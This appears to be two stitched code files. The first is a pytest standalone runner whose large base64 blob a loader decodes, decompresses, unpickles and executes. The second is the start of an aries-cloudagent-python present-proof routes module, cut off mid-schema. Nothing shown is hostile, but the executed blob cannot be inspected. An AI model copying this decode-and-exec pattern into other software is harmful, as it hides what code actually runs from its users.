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
<KEY>
"""
import sys
import base64
import zlib
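# DictImporter implements the PEP 302 meta-path importer protocol
# (find_module/load_module): once registered on sys.meta_path it serves the
# modules pickled into the `sources` blob above, with no filesystem access.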
class DictImporter(object):
def __init__(self, sources):
self.sources = sources
def find_module(self, fullname, path=None):
if fullname == "argparse" and sys.version_info >= (2,7):
# we were generated with <python2.7 (which pulls in argparse)
# but we are running now on a stdlib which has it, so use that.
return None
if fullname in self.sources:
return self
if fullname + '.__init__' in self.sources:
return self
return None
def load_module(self, fullname):
# print "load_module:", fullname
from types import ModuleType
try:
s = self.sources[fullname]
is_pkg = False
except KeyError:
s = self.sources[fullname + '.__init__']
is_pkg = True
co = compile(s, fullname, 'exec')
module = sys.modules.setdefault(fullname, ModuleType(fullname))
module.__file__ = "%s/%s" % (__file__, fullname)
module.__loader__ = self
if is_pkg:
module.__path__ = [fullname]
do_exec(co, module.__dict__) # noqa
return sys.modules[fullname]
def get_source(self, name):
res = self.sources.get(name)
if res is None:
res = self.sources.get(name + '.__init__')
return res
if __name__ == "__main__":
if sys.version_info >= (3, 0):
exec("def do_exec(co, loc): exec(co, loc)\n")
import pickle
sources = sources.encode("ascii") # ensure bytes
sources = pickle.loads(zlib.decompress(base64.decodebytes(sources)))
else:
import cPickle as pickle
exec("def do_exec(co, loc): exec co in loc\n")
sources = pickle.loads(zlib.decompress(base64.decodestring(sources)))
importer = DictImporter(sources)
sys.meta_path.insert(0, importer)
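    # with the importer first on sys.meta_path, the entry line below resolves
    # "import py" from the embedded sources rather than any installed copy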
entry = "import py; raise SystemExit(py.test.cmdline.main())"
do_exec(entry, locals()) # noqa
``` |
{
"source": "josephboyle/aries-cloudagent-python",
"score": 2
} |
#### File: present_proof/v1_0/routes.py
```python
import json
from uuid import uuid4
from aiohttp import web
from aiohttp_apispec import docs, request_schema, response_schema
from marshmallow import Schema, fields
from ....connections.models.connection_record import ConnectionRecord
from ....holder.base import BaseHolder
from ....messaging.decorators.attach_decorator import AttachDecorator
from ....messaging.valid import (
INDY_CRED_DEF_ID,
INDY_DID,
INDY_PREDICATE,
INDY_SCHEMA_ID,
INDY_VERSION,
INT_EPOCH,
UUIDFour,
)
from ....storage.error import StorageNotFoundError
from .manager import PresentationManager
from .messages.inner.presentation_preview import (
PresentationPreview,
PresentationPreviewSchema,
)
from .messages.presentation_proposal import PresentationProposal
from .messages.presentation_request import PresentationRequest
from .models.presentation_exchange import (
V10PresentationExchange,
V10PresentationExchangeSchema,
)
class V10PresentationExchangeListSchema(Schema):
"""Result schema for an Aries#0037 v1.0 presentation exchange query."""
results = fields.List(
fields.Nested(V10PresentationExchangeSchema()),
description="Aries#0037 v1.0 presentation exchange records",
)
class V10PresentationProposalRequestSchema(Schema):
"""Request schema for sending a presentation proposal admin message."""
connection_id = fields.UUID(
description="Connection identifier", required=True, example=UUIDFour.EXAMPLE,
)
comment = fields.Str(
description="Human-readable comment", required=False, default=""
)
presentation_proposal = fields.Nested(PresentationPreviewSchema(), required=True)
auto_present = fields.Boolean(
description=(
"Whether to respond automatically to presentation requests, building "
"and presenting requested proof"
),
required=False,
default=False,
)
class IndyProofReqSpecRestrictionsSchema(Schema):
"""Schema for restrictions in attr or pred specifier indy proof request."""
credential_definition_id = fields.Str(
